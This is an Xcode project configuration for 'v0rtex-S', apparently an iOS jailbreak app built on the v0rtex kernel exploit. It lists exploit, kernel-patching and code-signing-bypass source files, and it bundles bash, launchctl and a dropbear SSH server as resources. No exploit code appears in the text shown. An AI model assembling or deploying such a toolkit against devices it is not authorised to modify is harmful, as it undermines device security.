EE5252B11FDA4F2F00993801 /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = EE5252B01FDA4F2F00993801 /* ViewController.m */; }; 29 | EE5252B41FDA4F2F00993801 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EE5252B21FDA4F2F00993801 /* Main.storyboard */; }; 30 | EE5252B61FDA4F2F00993801 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = EE5252B51FDA4F2F00993801 /* Assets.xcassets */; }; 31 | EE5252B91FDA4F2F00993801 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EE5252B71FDA4F2F00993801 /* LaunchScreen.storyboard */; }; 32 | EE5252BC1FDA4F2F00993801 /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = EE5252BB1FDA4F2F00993801 /* main.m */; }; 33 | EE665E261FDC013D00FF457E /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = EE665E251FDC013D00FF457E /* IOKit.framework */; }; 34 | /* End PBXBuildFile section */ 35 | 36 | /* Begin PBXFileReference section */ 37 | 820EF0661FEAB0B2006104ED /* libjb.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = libjb.a; path = "v0rtex-S/the_super_fun_part/libjb.a"; sourceTree = ""; }; 38 | 820EF0681FEAB30D006104ED /* patchfinder64.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; name = patchfinder64.c; path = "v0rtex-S/the_super_fun_part/patchfinder64.c"; sourceTree = ""; }; 39 | 82178E091FEAFAF3002975CE /* amfi.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; name = amfi.m; path = "v0rtex-S/the_super_fun_part/amfi.m"; sourceTree = ""; }; 40 | 828494631FEC371E00C59308 /* bootstrap.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; name = bootstrap.tar; path = "v0rtex-S/bootstrap.tar"; sourceTree = ""; }; 41 | 8299A1741FEAB03D00BA3AB4 /* the_super_fun_part */ = {isa = PBXFileReference; lastKnownFileType = folder; path = the_super_fun_part; sourceTree = ""; }; 42 | 8299A1751FEAB04600BA3AB4 /* the_super_fun_part */ = {isa = PBXFileReference; lastKnownFileType = folder; path = the_super_fun_part; sourceTree = ""; }; 43 | 82AC281E1FF15709001E436A /* extrainst_ */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; name = extrainst_; path = "v0rtex-S/extrainst_"; sourceTree = ""; }; 44 | 82B603D71FEC555700241A80 /* tar */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; name = tar; path = "v0rtex-S/tar"; sourceTree = ""; }; 45 | 82B603D81FEC555700241A80 /* bash */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; name = bash; path = "v0rtex-S/bash"; sourceTree = ""; }; 46 | 82B603D91FEC555700241A80 /* bootstrap.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; name = bootstrap.tar; path = "v0rtex-S/bootstrap.tar"; sourceTree = ""; }; 47 | 82B603DA1FEC555800241A80 /* launchctl */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; name = launchctl; path = "v0rtex-S/launchctl"; sourceTree = ""; }; 48 | 82B603DB1FEC555800241A80 /* dropbear */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; name = dropbear; path = "v0rtex-S/dropbear"; sourceTree = ""; }; 49 | 82EDD2FC1FF67097003D49F5 /* cydia */ = {isa = PBXFileReference; lastKnownFileType = folder; path = cydia; sourceTree = ""; }; 50 | 82EDD2FD1FF670A4003D49F5 /* jailbreakd.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; name = jailbreakd.m; path = "v0rtex-S/cydia/jailbreakd.m"; sourceTree = ""; }; 51 | 82EDD2FF1FF67BC6003D49F5 /* cydo */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; name = cydo; path = "v0rtex-S/cydo"; sourceTree = ""; }; 52 | B58B323D1FE4EBA300EB7B47 /* kernel.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = kernel.m; sourceTree = ""; }; 53 | B58B323F1FE4EBA300EB7B47 /* kernel.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kernel.h; sourceTree = ""; }; 54 | B58B32431FE4ED3B00EB7B47 /* ls */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = ls; sourceTree = ""; }; 55 | B58B32451FE4ED6300EB7B47 /* symbols.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = symbols.m; sourceTree = ""; }; 56 | B58B32471FE4EDCF00EB7B47 /* symbols.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = symbols.h; sourceTree = ""; }; 57 | B58B32481FE4F3DF00EB7B47 /* root-rw.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = "root-rw.m"; sourceTree = ""; }; 58 | B58B324A1FE4F3F900EB7B47 /* root-rw.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = "root-rw.h"; sourceTree = ""; }; 59 | B5BB8F781FE4D97800B60FDC /* README.md */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = net.daringfireball.markdown; path = README.md; sourceTree = ""; }; 60 | EE5169271FDC2A7000805460 /* v0rtex.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = v0rtex.m; sourceTree = ""; }; 61 | EE5169291FDC2C9D00805460 /* common.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = common.h; sourceTree = ""; }; 62 | EE5252A91FDA4F2F00993801 /* v0rtex.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = v0rtex.app; sourceTree = BUILT_PRODUCTS_DIR; }; 63 | EE5252AC1FDA4F2F00993801 /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; 64 | EE5252AD1FDA4F2F00993801 /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; 65 | EE5252AF1FDA4F2F00993801 /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; 66 | EE5252B01FDA4F2F00993801 /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; 67 | EE5252B31FDA4F2F00993801 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; 68 | EE5252B51FDA4F2F00993801 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 69 | EE5252B81FDA4F2F00993801 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; 70 | EE5252BA1FDA4F2F00993801 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; 71 | EE5252BB1FDA4F2F00993801 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; 72 | EE665E251FDC013D00FF457E /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = ../../../../../System/Library/Frameworks/IOKit.framework; sourceTree = ""; }; 73 | EE81AD151FDEF1AB0094418B /* v0rtex.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = v0rtex.h; sourceTree = ""; }; 74 | /* End PBXFileReference section */ 75 | 76 | /* Begin PBXFrameworksBuildPhase section */ 77 | EE5252A61FDA4F2F00993801 /* Frameworks */ = { 78 | isa = PBXFrameworksBuildPhase; 79 | buildActionMask = 2147483647; 80 | files = ( 81 | 820EF0671FEAB0B2006104ED /* libjb.a in Frameworks */, 82 | EE665E261FDC013D00FF457E /* IOKit.framework in Frameworks */, 83 | ); 84 | runOnlyForDeploymentPostprocessing = 0; 85 | }; 86 | /* End PBXFrameworksBuildPhase section */ 87 | 88 | /* Begin PBXGroup section */ 89 | EE5252A01FDA4F2F00993801 = { 90 | isa = PBXGroup; 91 | children = ( 92 | 82EDD2FF1FF67BC6003D49F5 /* cydo */, 93 | 82EDD2FD1FF670A4003D49F5 /* jailbreakd.m */, 94 | 82AC281E1FF15709001E436A /* extrainst_ */, 95 | 828494631FEC371E00C59308 /* bootstrap.tar */, 96 | 82B603D81FEC555700241A80 /* bash */, 97 | 82B603D91FEC555700241A80 /* bootstrap.tar */, 98 | 82B603DB1FEC555800241A80 /* dropbear */, 99 | 82B603DA1FEC555800241A80 /* launchctl */, 100 | 82B603D71FEC555700241A80 /* tar */, 101 | 82178E091FEAFAF3002975CE /* amfi.m */, 102 | 820EF0681FEAB30D006104ED /* patchfinder64.c */, 103 | B5BB8F781FE4D97800B60FDC /* README.md */, 104 | EE5252AB1FDA4F2F00993801 /* v0rtex-S */, 105 | EE5252AA1FDA4F2F00993801 /* Products */, 106 | EE665E201FDBFDB600FF457E /* Frameworks */, 107 | ); 108 | sourceTree = ""; 109 | }; 110 | EE5252AA1FDA4F2F00993801 /* Products */ = { 111 | isa = PBXGroup; 112 | children = ( 113 | EE5252A91FDA4F2F00993801 /* v0rtex.app */, 114 | ); 115 | name = Products; 116 | sourceTree = ""; 117 | }; 118 | EE5252AB1FDA4F2F00993801 /* v0rtex-S */ = { 119 | isa = PBXGroup; 120 | children = ( 121 | EEAC27D31FDDB0A3003C1801 /* Supporting Files */, 122 | B58B32431FE4ED3B00EB7B47 /* ls */, 123 | 82EDD2FC1FF67097003D49F5 /* cydia */, 124 | 8299A1751FEAB04600BA3AB4 /* the_super_fun_part */, 125 | EE5252BB1FDA4F2F00993801 /* main.m */, 126 | EE5252AC1FDA4F2F00993801 /* AppDelegate.h */, 127 | EE5252AD1FDA4F2F00993801 /* AppDelegate.m */, 128 | EE5252AF1FDA4F2F00993801 /* ViewController.h */, 129 | EE5252B01FDA4F2F00993801 /* ViewController.m */, 130 | EE5169291FDC2C9D00805460 /* common.h */, 131 | EE81AD151FDEF1AB0094418B /* v0rtex.h */, 132 | EE5169271FDC2A7000805460 /* v0rtex.m */, 133 | B58B323F1FE4EBA300EB7B47 /* kernel.h */, 134 | B58B323D1FE4EBA300EB7B47 /* kernel.m */, 135 | B58B32451FE4ED6300EB7B47 /* symbols.m */, 136 | B58B32471FE4EDCF00EB7B47 /* symbols.h */, 137 | B58B32481FE4F3DF00EB7B47 /* root-rw.m */, 138 | B58B324A1FE4F3F900EB7B47 /* root-rw.h */, 139 | ); 140 | path = "v0rtex-S"; 141 | sourceTree = ""; 142 | }; 143 | EE665E201FDBFDB600FF457E /* Frameworks */ = { 144 | isa = PBXGroup; 145 | children = ( 146 | 820EF0661FEAB0B2006104ED /* libjb.a */, 147 | EE665E251FDC013D00FF457E /* IOKit.framework */, 148 | ); 149 | name = Frameworks; 150 | sourceTree = ""; 151 | }; 152 | EEAC27D31FDDB0A3003C1801 /* Supporting Files */ = { 153 | isa = PBXGroup; 154 | children = ( 155 | 8299A1741FEAB03D00BA3AB4 /* the_super_fun_part */, 156 | EE5252BA1FDA4F2F00993801 /* Info.plist */, 157 | EE5252B51FDA4F2F00993801 /* Assets.xcassets */, 158 | EE5252B71FDA4F2F00993801 /* LaunchScreen.storyboard */, 159 | EE5252B21FDA4F2F00993801 /* Main.storyboard */, 160 | ); 161 | name = "Supporting Files"; 162 | sourceTree = ""; 163 | }; 164 | /* End PBXGroup section */ 165 | 166 | /* Begin PBXNativeTarget section */ 167 | EE5252A81FDA4F2F00993801 /* v0rtex */ = { 168 | isa = PBXNativeTarget; 169 | buildConfigurationList = EE5252BF1FDA4F2F00993801 /* Build configuration list for PBXNativeTarget "v0rtex" */; 170 | buildPhases = ( 171 | EE5252A51FDA4F2F00993801 /* Sources */, 172 | EE5252A61FDA4F2F00993801 /* Frameworks */, 173 | EE5252A71FDA4F2F00993801 /* Resources */, 174 | ); 175 | buildRules = ( 176 | ); 177 | dependencies = ( 178 | ); 179 | name = v0rtex; 180 | productName = v0rtex; 181 | productReference = EE5252A91FDA4F2F00993801 /* v0rtex.app */; 182 | productType = "com.apple.product-type.application"; 183 | }; 184 | /* End PBXNativeTarget section */ 185 | 186 | /* Begin PBXProject section */ 187 | EE5252A11FDA4F2F00993801 /* Project object */ = { 188 | isa = PBXProject; 189 | attributes = { 190 | LastUpgradeCheck = 0900; 191 | ORGANIZATIONNAME = Sticktron; 192 | TargetAttributes = { 193 | EE5252A81FDA4F2F00993801 = { 194 | CreatedOnToolsVersion = 9.0; 195 | ProvisioningStyle = Automatic; 196 | }; 197 | }; 198 | }; 199 | buildConfigurationList = EE5252A41FDA4F2F00993801 /* Build configuration list for PBXProject "v0rtex-s" */; 200 | compatibilityVersion = "Xcode 8.0"; 201 | developmentRegion = en; 202 | hasScannedForEncodings = 0; 203 | knownRegions = ( 204 | en, 205 | Base, 206 | ); 207 | mainGroup = EE5252A01FDA4F2F00993801; 208 | productRefGroup = EE5252AA1FDA4F2F00993801 /* Products */; 209 | projectDirPath = ""; 210 | projectRoot = ""; 211 | targets = ( 212 | EE5252A81FDA4F2F00993801 /* v0rtex */, 213 | ); 214 | }; 215 | /* End PBXProject section */ 216 | 217 | /* Begin PBXResourcesBuildPhase section */ 218 | EE5252A71FDA4F2F00993801 /* Resources */ = { 219 | isa = PBXResourcesBuildPhase; 220 | buildActionMask = 2147483647; 221 | files = ( 222 | B58B32441FE4ED3B00EB7B47 /* ls in Resources */, 223 | 82B603DC1FEC555800241A80 /* tar in Resources */, 224 | 82B603DD1FEC555800241A80 /* bash in Resources */, 225 | 828494641FEC371E00C59308 /* bootstrap.tar in Resources */, 226 | 82AC281F1FF15709001E436A /* extrainst_ in Resources */, 227 | 82B603DE1FEC555800241A80 /* launchctl in Resources */, 228 | 82B603DF1FEC555800241A80 /* dropbear in Resources */, 229 | 82EDD3001FF67BC6003D49F5 /* cydo in Resources */, 230 | EE5252B91FDA4F2F00993801 /* LaunchScreen.storyboard in Resources */, 231 | EE5252B61FDA4F2F00993801 /* Assets.xcassets in Resources */, 232 | B5BB8F791FE4D97800B60FDC /* README.md in Resources */, 233 | EE5252B41FDA4F2F00993801 /* Main.storyboard in Resources */, 234 | ); 235 | runOnlyForDeploymentPostprocessing = 0; 236 | }; 237 | /* End PBXResourcesBuildPhase section */ 238 | 239 | /* Begin PBXSourcesBuildPhase section */ 240 | EE5252A51FDA4F2F00993801 /* Sources */ = { 241 | isa = PBXSourcesBuildPhase; 242 | buildActionMask = 2147483647; 243 | files = ( 244 | B58B32491FE4F3DF00EB7B47 /* root-rw.m in Sources */, 245 | B58B32401FE4EBA300EB7B47 /* kernel.m in Sources */, 246 | B58B32461FE4ED6300EB7B47 /* symbols.m in Sources */, 247 | EE5252B11FDA4F2F00993801 /* ViewController.m in Sources */, 248 | EE5252BC1FDA4F2F00993801 /* main.m in Sources */, 249 | 82EDD2FE1FF670A5003D49F5 /* jailbreakd.m in Sources */, 250 | EE5252AE1FDA4F2F00993801 /* AppDelegate.m in Sources */, 251 | 82178E0A1FEAFAF3002975CE /* amfi.m in Sources */, 252 | 820EF06A1FEAB30D006104ED /* patchfinder64.c in Sources */, 253 | EE5169281FDC2A7000805460 /* v0rtex.m in Sources */, 254 | ); 255 | runOnlyForDeploymentPostprocessing = 0; 256 | }; 257 | /* End PBXSourcesBuildPhase section */ 258 | 259 | /* Begin PBXVariantGroup section */ 260 | EE5252B21FDA4F2F00993801 /* Main.storyboard */ = { 261 | isa = PBXVariantGroup; 262 | children = ( 263 | EE5252B31FDA4F2F00993801 /* Base */, 264 | ); 265 | name = Main.storyboard; 266 | sourceTree = ""; 267 | }; 268 | EE5252B71FDA4F2F00993801 /* LaunchScreen.storyboard */ = { 269 | isa = PBXVariantGroup; 270 | children = ( 271 | EE5252B81FDA4F2F00993801 /* Base */, 272 | ); 273 | name = LaunchScreen.storyboard; 274 | sourceTree = ""; 275 | }; 276 | /* End PBXVariantGroup section */ 277 | 278 | /* Begin XCBuildConfiguration section */ 279 | EE5252BD1FDA4F2F00993801 /* Debug */ = { 280 | isa = XCBuildConfiguration; 281 | buildSettings = { 282 | ALWAYS_SEARCH_USER_PATHS = YES; 283 | CLANG_ANALYZER_NONNULL = YES; 284 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 285 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 286 | CLANG_CXX_LIBRARY = "libc++"; 287 | CLANG_ENABLE_MODULES = YES; 288 | CLANG_ENABLE_OBJC_ARC = YES; 289 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 290 | CLANG_WARN_BOOL_CONVERSION = YES; 291 | CLANG_WARN_COMMA = YES; 292 | CLANG_WARN_CONSTANT_CONVERSION = YES; 293 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 294 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 295 | CLANG_WARN_EMPTY_BODY = YES; 296 | CLANG_WARN_ENUM_CONVERSION = YES; 297 | CLANG_WARN_INFINITE_RECURSION = YES; 298 | CLANG_WARN_INT_CONVERSION = YES; 299 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 300 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 301 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 302 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 303 | CLANG_WARN_STRICT_PROTOTYPES = YES; 304 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 305 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 306 | CLANG_WARN_UNREACHABLE_CODE = YES; 307 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 308 | CODE_SIGN_IDENTITY = "iPhone Developer"; 309 | COPY_PHASE_STRIP = NO; 310 | DEBUG_INFORMATION_FORMAT = dwarf; 311 | ENABLE_STRICT_OBJC_MSGSEND = YES; 312 | ENABLE_TESTABILITY = YES; 313 | GCC_C_LANGUAGE_STANDARD = gnu11; 314 | GCC_DYNAMIC_NO_PIC = NO; 315 | GCC_NO_COMMON_BLOCKS = YES; 316 | GCC_OPTIMIZATION_LEVEL = 0; 317 | GCC_PREPROCESSOR_DEFINITIONS = ( 318 | "DEBUG=1", 319 | "$(inherited)", 320 | ); 321 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 322 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 323 | GCC_WARN_UNDECLARED_SELECTOR = YES; 324 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 325 | GCC_WARN_UNUSED_FUNCTION = YES; 326 | GCC_WARN_UNUSED_VARIABLE = YES; 327 | IPHONEOS_DEPLOYMENT_TARGET = 10.0; 328 | MTL_ENABLE_DEBUG_INFO = YES; 329 | ONLY_ACTIVE_ARCH = YES; 330 | SDKROOT = iphoneos; 331 | USER_HEADER_SEARCH_PATHS = "/Users/sticktron/theos/include/**"; 332 | }; 333 | name = Debug; 334 | }; 335 | EE5252BE1FDA4F2F00993801 /* Release */ = { 336 | isa = XCBuildConfiguration; 337 | buildSettings = { 338 | ALWAYS_SEARCH_USER_PATHS = YES; 339 | CLANG_ANALYZER_NONNULL = YES; 340 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 341 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 342 | CLANG_CXX_LIBRARY = "libc++"; 343 | CLANG_ENABLE_MODULES = YES; 344 | CLANG_ENABLE_OBJC_ARC = YES; 345 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 346 | CLANG_WARN_BOOL_CONVERSION = YES; 347 | CLANG_WARN_COMMA = YES; 348 | CLANG_WARN_CONSTANT_CONVERSION = YES; 349 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 350 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 351 | CLANG_WARN_EMPTY_BODY = YES; 352 | CLANG_WARN_ENUM_CONVERSION = YES; 353 | CLANG_WARN_INFINITE_RECURSION = YES; 354 | CLANG_WARN_INT_CONVERSION = YES; 355 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 356 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 357 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 358 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 359 | CLANG_WARN_STRICT_PROTOTYPES = YES; 360 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 361 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 362 | CLANG_WARN_UNREACHABLE_CODE = YES; 363 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 364 | CODE_SIGN_IDENTITY = "iPhone Developer"; 365 | COPY_PHASE_STRIP = NO; 366 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 367 | ENABLE_NS_ASSERTIONS = NO; 368 | ENABLE_STRICT_OBJC_MSGSEND = YES; 369 | GCC_C_LANGUAGE_STANDARD = gnu11; 370 | GCC_NO_COMMON_BLOCKS = YES; 371 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 372 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 373 | GCC_WARN_UNDECLARED_SELECTOR = YES; 374 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 375 | GCC_WARN_UNUSED_FUNCTION = YES; 376 | GCC_WARN_UNUSED_VARIABLE = YES; 377 | IPHONEOS_DEPLOYMENT_TARGET = 10.0; 378 | MTL_ENABLE_DEBUG_INFO = NO; 379 | SDKROOT = iphoneos; 380 | USER_HEADER_SEARCH_PATHS = "/Users/sticktron/theos/include/**"; 381 | VALIDATE_PRODUCT = YES; 382 | }; 383 | name = Release; 384 | }; 385 | EE5252C01FDA4F2F00993801 /* Debug */ = { 386 | isa = XCBuildConfiguration; 387 | buildSettings = { 388 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 389 | "CODE_SIGN_IDENTITY[sdk=iphoneos*]" = "iPhone Developer"; 390 | CODE_SIGN_STYLE = Automatic; 391 | DEVELOPMENT_TEAM = 22G2QV87A2; 392 | ENABLE_BITCODE = NO; 393 | INFOPLIST_FILE = "$(SRCROOT)/v0rtex-S/Info.plist"; 394 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 395 | LIBRARY_SEARCH_PATHS = ( 396 | "$(inherited)", 397 | "$(PROJECT_DIR)/v0rtex-S/the_super_fun_part", 398 | ); 399 | PRODUCT_BUNDLE_IDENTIFIER = com.sticktron.v0rtexroot; 400 | PRODUCT_NAME = "$(TARGET_NAME)"; 401 | PROVISIONING_PROFILE_SPECIFIER = ""; 402 | TARGETED_DEVICE_FAMILY = "1,2"; 403 | }; 404 | name = Debug; 405 | }; 406 | EE5252C11FDA4F2F00993801 /* Release */ = { 407 | isa = XCBuildConfiguration; 408 | buildSettings = { 409 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 410 | "CODE_SIGN_IDENTITY[sdk=iphoneos*]" = "iPhone Developer"; 411 | CODE_SIGN_STYLE = Automatic; 412 | DEVELOPMENT_TEAM = 22G2QV87A2; 413 | ENABLE_BITCODE = NO; 414 | INFOPLIST_FILE = "$(SRCROOT)/v0rtex-S/Info.plist"; 415 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 416 | LIBRARY_SEARCH_PATHS = ( 417 | "$(inherited)", 418 | "$(PROJECT_DIR)/v0rtex-S/the_super_fun_part", 419 | ); 420 | PRODUCT_BUNDLE_IDENTIFIER = com.sticktron.v0rtexroot; 421 | PRODUCT_NAME = "$(TARGET_NAME)"; 422 | PROVISIONING_PROFILE_SPECIFIER = ""; 423 | TARGETED_DEVICE_FAMILY = "1,2"; 424 | }; 425 | name = Release; 426 | }; 427 | /* End XCBuildConfiguration section */ 428 | 429 | /* Begin XCConfigurationList section */ 430 | EE5252A41FDA4F2F00993801 /* Build configuration list for PBXProject "v0rtex-s" */ = { 431 | isa = XCConfigurationList; 432 | buildConfigurations = ( 433 | EE5252BD1FDA4F2F00993801 /* Debug */, 434 | EE5252BE1FDA4F2F00993801 /* Release */, 435 | ); 436 | defaultConfigurationIsVisible = 0; 437 | defaultConfigurationName = Release; 438 | }; 439 | EE5252BF1FDA4F2F00993801 /* Build configuration list for PBXNativeTarget "v0rtex" */ = { 440 | isa = XCConfigurationList; 441 | buildConfigurations = ( 442 | EE5252C01FDA4F2F00993801 /* Debug */, 443 | EE5252C11FDA4F2F00993801 /* Release */, 444 | ); 445 | defaultConfigurationIsVisible = 0; 446 | defaultConfigurationName = Release; 447 | }; 448 | /* End XCConfigurationList section */ 449 | }; 450 | rootObject = EE5252A11FDA4F2F00993801 /* Project object */; 451 | } 452 | -------------------------------------------------------------------------------- /v0rtex-s.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /v0rtex-s.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-s.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /v0rtex-s.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 8 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /v0rtex-s.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | v0rtex.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | 14 | 15 | --------------------------------------------------------------------------------